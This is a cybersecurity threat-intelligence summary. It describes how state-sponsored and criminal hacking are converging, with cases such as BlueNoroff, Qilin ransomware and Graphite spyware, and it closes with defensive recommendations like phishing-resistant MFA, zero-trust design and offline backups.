The convergence of state-sponsored and organized cybercrime is increasingly evident, with nation-states leveraging criminal tactics (e.g., North Korea’s BlueNoroff using deepfakes for crypto theft) and cybercriminals adopting advanced tools (e.g., Qilin ransomware’s RaaS model). Operations like Ukraine’s extradition of ransomware actors and Thailand’s raid on hybrid cybercrime-racketeering hubs underscore blurred lines between geopolitical agendas and profit-driven crime. Paragon’s Graphite spyware, linked to Italian government surveillance, exemplifies dual-use tools enabling both state repression and criminal exploitation. This symbiosis amplifies threats, necessitating global collaboration to counter evolving hybrid adversaries.

Operational and Tactical Implications

Law enforcement’s cross-border collaboration and cryptocurrency tracking capabilities are disrupting darknet markets and ransomware groups, necessitating threat actors to adopt advanced obfuscation techniques like complex laundering networks and encrypted communication.
Ransomware-as-a-Service (RaaS) models and macOS-targeting malware highlight evolving attacker TTPs, requiring organizations to prioritize phishing-resistant MFA, endpoint detection, and air-gapped backups to mitigate encryption and data exfiltration risks.
Insider threats and third-party vulnerabilities (e.g., HealthEC, 23andMe) underscore systemic risks in supply chains and privileged access management, demanding stricter vendor audits, zero-trust architectures, and real-time behavioral monitoring.
State-aligned APTs and commercial spyware (e.g., Graphite, BlueNoroff) exploit zero-day vulnerabilities and deepfakes, compelling enterprises to adopt Lockdown Mode, memory scanning, and AI-driven anomaly detection for high-value targets.
Convergence of cyber-physical criminal operations (e.g., Thai ransomware gambling hubs) and critical infrastructure attacks (WestJet, NHS) require integrated defense strategies combining network segmentation, physical security audits, and cross-sector threat intelligence sharing.

Forward-Looking Recommendations

Enhance international collaboration frameworks to disrupt darknet markets and ransomware operations through shared intelligence and coordinated takedowns.
Prioritize zero-trust architectures and mandatory patch management to mitigate zero-click exploits, spyware, and critical vulnerabilities in widely used software.
Strengthen third-party vendor risk assessments, particularly in healthcare and critical infrastructure, with enforceable compliance audits and real-time monitoring.
Adopt AI-driven behavioral analytics and phishing-resistant MFA to counter evolving social engineering, deepfake, and credential-stuffing campaigns.
Implement immutable offline backups and regular ransomware response drills to counter double extortion and data-wiping tactics like Anubis’ “wipe mode.”
Expand blockchain forensic capabilities and enforce stricter crypto transaction regulations to combat laundering networks and high-value theft.
Mandate privileged access reviews and continuous monitoring to mitigate insider threats, coupled with strict data loss prevention policies.
Accelerate adoption of memory-safe languages (e.g., Rust) and secure-by-design principles in software development to reduce exploit risks.
Deploy deception technologies and network segmentation to detect APT lateral movement and hybrid cyber-physical criminal operations.
Establish cross-sector incident response alliances with governments to fortify critical infrastructure against disruptive attacks.